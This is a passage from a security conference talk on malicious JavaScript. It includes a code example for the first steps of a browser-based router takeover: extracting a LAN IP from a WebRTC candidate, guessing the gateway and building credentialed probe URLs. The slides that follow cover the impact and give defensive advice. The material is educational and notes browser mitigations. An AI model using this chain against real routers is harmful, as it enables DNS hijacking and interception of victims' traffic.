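The parts of this scenario that do not need a browser, as an added example that is not the slide's page: extracting the address from a WebRTC ICE candidate, checking it is a LAN address, guessing the gateway from it and building the credentialed probe URL. The candidate line is constructed in the format RFC 5245 defines; the router path is a placeholder and the "/24" assumption is stated in the code. Two caveats a practitioner needs: since 2019 Chrome and Firefox hand out mDNS names such as `<uuid>.local` instead of the host's LAN IP in ICE candidates, so the extraction step mostly comes back empty on current browsers, and Chrome has blocked credentials embedded in subresource URLs since version 59, so the image-load trick itself fails there (CSRF against the router's form endpoints does not depend on it).

```javascript
// Added example (not the slide's page): the pure pieces of the router
// takeover chain. Constructed inputs; the router path is a placeholder.

// A host candidate in RFC 5245 format (constructed). Field 5 is the
// connection address that the WebRTC trick reads.
const SAMPLE_CANDIDATE =
  'candidate:842163049 1 udp 2122260223 192.168.1.23 58312 typ host generation 0';

// Pull the connection address out of an ICE candidate string. Current
// browsers put an mDNS name ("<uuid>.local") here instead of the LAN IP,
// in which case this returns null.
function ipFromCandidate(cand) {
  const fields = cand.trim().split(/\s+/);
  const addr = fields[4] || '';
  return /^\d{1,3}(\.\d{1,3}){3}$/.test(addr) ? addr : null;
}

// RFC 1918 ranges: 10/8, 172.16/12, 192.168/16.
function isPrivateIPv4(ip) {
  const [a, b] = ip.split('.').map(Number);
  return a === 10 || (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
}

// Guess the gateway from the internal IP. Assumes a /24, the common home
// network case; .1 and .254 cover most consumer routers.
function candidateGateways(ip) {
  const prefix = ip.split('.').slice(0, 3).join('.');
  return [`${prefix}.1`, `${prefix}.254`];
}

// URL for the image-load probe: credentials in the URL answer the router's
// Basic Auth challenge. Blocked for subresources by Chrome since v59.
function probeUrl(gateway, user, pass, path) {
  return `http://${encodeURIComponent(user)}:${encodeURIComponent(pass)}@${gateway}${path}`;
}

// Whole pipeline for one candidate line: the probe URLs the page would
// try, or an empty list when the browser did not expose a LAN address.
function probeUrlsFor(candidateLine, user, pass, path) {
  const ip = ipFromCandidate(candidateLine);
  if (ip === null || !isPrivateIPv4(ip)) return [];
  return candidateGateways(ip).map((gw) => probeUrl(gw, user, pass, path));
}
```

In the page, `probeUrlsFor` is what runs inside the `onicecandidate` callback; the `onload` handler of the probe image is where the DNS-changing requests, which are specific to each router model, would be fired.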

Slide 68

Slide 68 text

WHAT COULD GO WRONG FROM HERE
• Active and passive man-in-the-middle attacks
• Phishing attacks that steal credentials by resolving legitimate names to attacker-controlled hosts
• Tampered software updates served from malicious domains, giving direct compromise of the victim system(s)
• The attacker has essentially full visibility and control of the target network

Slide 69

Slide 69 text

CLOSING NOTES

Slide 70

Slide 70 text

TO CLOSE • JS is not only used to build stuff but actively used by attackers to do all sorts of cool things • Do not trust user input, anytime, anywhere • Patch your browsers, update your apps • Change default credentials, everywhere • Be wary of the sites you visit, the links you click and the attachments you open • There is no Nigerian prince who wants to give you money

Slide 71

Slide 71 text

Q & A

Slide 72

Slide 72 text

REFERENCES
• https://github.com/beefproject/beef/wiki
• https://cure53.de/fp170.pdf
• https://www.youtube.com/watch?v=lG7U3fuNw3A
• https://github.com/appsecco/dvna
• https://parsiya.net/blog/2019-06-18-chaining-three-bugs-to-get-rce-in-microsoft-attacksurfaceanalyzer/#vuln-3-xss-to-rce-via-nodeintegration
• https://hackernoon.com/exploiting-electron-rce-in-exodus-wallet-d9e6db13c374
• https://thehackerblog.com/i-too-like-to-live-dangerously-accidentally-finding-rce-in-signal-desktop-via-html-injection-in-quoted-replies/
• https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
• https://gist.github.com/xsscx/0e55b25f6b959bf572a9
• https://support.google.com/webmasters/answer/3024344?hl=en
• https://sites.cs.ucsb.edu/~vigna/publications/2010_cova_kruegel_vigna_Wepawet.pdf
• https://blog.sucuri.net/2017/12/javascript-injection-creates-rogue-wordpress-admin-user.html
• https://github.com/Escapingbug/awesome-browser-exploit
• https://www.pentestpartners.com/security-blog/lan-surfing-how-to-use-javascript-to-execute-arbitrary-code-on-routers/
• https://www.spamfighter.com/News-20220-Malware-Based-on-JavaScript-Attacks-DNS-Settings-of-Your-Router.htm
• https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-devices-used-to-execute-dns-malware-against-home-routers/

Slide 73

Slide 73 text

THANK YOU!
• Riyaz Ahemed Walikar
• @riyazwalikar
• @appseccouk
• https://blog.appsecco.com
• https://appsecco.com
• https://ibreak.software